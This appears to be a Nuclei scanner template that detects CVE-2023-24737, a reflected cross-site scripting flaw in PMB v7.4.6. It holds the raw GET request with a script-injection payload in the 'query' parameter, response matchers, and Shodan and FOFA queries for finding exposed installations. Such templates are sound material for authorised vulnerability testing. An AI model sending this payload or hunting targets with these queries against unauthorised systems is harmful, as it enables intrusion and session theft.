id: CVE-2023-24737 info: name: PMB v7.4.6 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of PMB. reference: - https://github.com/AetherBlack/CVE/blob/main/PMB/readme.md - https://github.com/AetherBlack/CVE/tree/main/PMB - https://nvd.nist.gov/vuln/detail/CVE-2023-24737 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-24737 cwe-id: CWE-79 epss-score: 0.00099 epss-percentile: 0.41025 cpe: cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: sigb product: pmb shodan-query: - http.favicon.hash:1469328760 - http.html:"pmb group" fofa-query: - body="pmb group" - icon_hash=1469328760 tags: cve2023,cve,xss,pmb,pmb_project,sigb http: - raw: - | GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '3@1=' - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 490a0046304402205aca91058a68b052da6ad45486312b6d8aabb6f3784060d9f272c810fa6aa5e1022001e381be655320e8762a3c3680508216045524f3a62dc26bd7b30ccd633c98e8:922c64590222798bb761d5b6d8e72950